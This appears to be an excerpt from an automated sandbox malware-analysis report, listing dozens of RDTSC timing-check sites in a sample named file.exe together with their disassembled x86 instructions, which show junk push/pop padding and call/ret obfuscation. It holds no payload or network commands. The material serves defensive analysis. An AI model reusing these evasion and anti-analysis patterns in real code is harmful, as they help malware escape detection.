Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A456 second address: 32A45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A45A second address: 32A4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F27492B520Ah 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F27492B5208h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b call 00007F27492B5209h 0x00000030 jmp 00007F27492B5211h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F27492B520Ah 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A4B9 second address: 32A502 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2749204C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F2749204C37h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jg 00007F2749204C32h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A502 second address: 32A5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F27492B5208h 0x0000000b popad 0x0000000c pop eax 0x0000000d sbb edx, 0E1DC892h 0x00000013 push 00000003h 0x00000015 jmp 00007F27492B520Fh 0x0000001a push esi 0x0000001b movzx edi, ax 0x0000001e pop ecx 0x0000001f push 00000000h 0x00000021 jbe 00007F27492B5220h 0x00000027 push 00000003h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F27492B5208h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 or dword ptr [ebp+122D2DD3h], esi 0x00000049 call 00007F27492B5209h 0x0000004e pushad 0x0000004f jmp 00007F27492B520Dh 0x00000054 jmp 00007F27492B520Fh 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jnc 00007F27492B520Ch 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A5B0 second address: 32A605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F2749204C35h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 push ebx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jmp 00007F2749204C36h 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 34BE25 second address: 34BE4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 jmp 00007F27492B5215h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f jp 00007F27492B5206h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 349CF3 second address: 349D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F2749204C35h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 349D24 second address: 349D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5213h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 349D3B second address: 349D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2749204C37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007F2749204C26h 0x00000012 jmp 00007F2749204C33h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2749204C2Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349D85 second address: 349DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5217h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349ECF second address: 349EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F2749204C2Eh 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349EE5 second address: 349EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A76A second address: 34A79C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F2749204C28h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jc 00007F2749204C2Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A903 second address: 34A90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F27492B5206h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A90E second address: 34A91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F2749204C26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A91B second address: 34A941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F27492B521Bh 0x00000011 jns 00007F27492B5206h 0x00000017 jmp 00007F27492B520Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A941 second address: 34A94A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AC0F second address: 34AC3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5210h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F27492B5217h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33FD98 second address: 33FDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316149 second address: 31614D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31614D second address: 316153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF20 second address: 34AF29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF29 second address: 34AF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF31 second address: 34AF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF36 second address: 34AF41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF41 second address: 34AF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F445 second address: 34F449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F449 second address: 34F482 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007F27492B5217h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F27492B520Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F482 second address: 34F488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F488 second address: 34F48D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F565 second address: 34F57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F716 second address: 34F71C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F71C second address: 34F723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E7F4 second address: 31E80F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27492B5216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3578FA second address: 357917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C35h 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357917 second address: 357941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5216h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27492B520Bh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357941 second address: 357945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C5F second address: 312C66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C66 second address: 312C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C70 second address: 312C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C76 second address: 312C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3571B1 second address: 3571CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5216h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3571CC second address: 3571DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2749204C2Ch 0x00000008 jc 00007F2749204C26h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3571DD second address: 3571E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3574D2 second address: 3574EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2749204C32h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3574EC second address: 3574F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35763A second address: 35763E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359EFE second address: 359F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A90E second address: 35A94C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and di, 3022h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jmp 00007F2749204C36h 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A94C second address: 35A952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A952 second address: 35A956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A956 second address: 35A968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F27492B520Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AE41 second address: 35AEA0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2749204C28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1B9Bh], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F2749204C28h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov edi, eax 0x00000033 xchg eax, ebx 0x00000034 jmp 00007F2749204C2Dh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F2749204C37h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CA72 second address: 35CA77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0BF second address: 35C0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CA77 second address: 35CAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B520Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F27492B520Eh 0x00000012 nop 0x00000013 mov dword ptr [ebp+1245EDD3h], edx 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c jp 00007F27492B5209h 0x00000022 movsx edi, si 0x00000025 pop esi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F27492B5208h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov esi, dword ptr [ebp+122D24A7h] 0x00000048 push eax 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0C5 second address: 35C0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0C9 second address: 35C0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F27492B5213h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0EB second address: 35C0F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35ECF5 second address: 35ECFF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35ECFF second address: 35EDB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F2749204C28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F2749204C28h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 ja 00007F2749204C2Ch 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b call 00007F2749204C28h 0x00000050 pop esi 0x00000051 mov dword ptr [esp+04h], esi 0x00000055 add dword ptr [esp+04h], 00000019h 0x0000005d inc esi 0x0000005e push esi 0x0000005f ret 0x00000060 pop esi 0x00000061 ret 0x00000062 mov di, dx 0x00000065 jmp 00007F2749204C31h 0x0000006a xchg eax, ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e jmp 00007F2749204C36h 0x00000073 pop eax 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EDB4 second address: 35EDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EDBA second address: 35EDD9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2749204C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2749204C30h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F935 second address: 35F93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F93B second address: 35F959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2749204C39h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F959 second address: 35F965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36034C second address: 360367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C2Bh 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d jc 00007F2749204C2Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 360367 second address: 3603FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5219h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F27492B5208h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jmp 00007F27492B5219h 0x0000002a mov dword ptr [ebp+122D1B61h], edi 0x00000030 mov di, F9C2h 0x00000034 push 00000000h 0x00000036 jmp 00007F27492B520Fh 0x0000003b push 00000000h 0x0000003d sub edi, dword ptr [ebp+122D2C44h] 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 jmp 00007F27492B5215h 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3603FF second address: 360405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364945 second address: 364949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364949 second address: 36496B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2749204C39h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364A92 second address: 364A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36683A second address: 36683E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3659E6 second address: 3659ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36683E second address: 366896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2749204C28h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F2749204C28h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, edx 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D1B14h] 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F2749204C38h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364B50 second address: 364B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366896 second address: 3668B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3668B3 second address: 3668B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3676F0 second address: 367701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3686EA second address: 3686EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3678A5 second address: 3678D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F2749204C37h 0x00000012 jmp 00007F2749204C31h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3678D0 second address: 3678DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27492B520Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
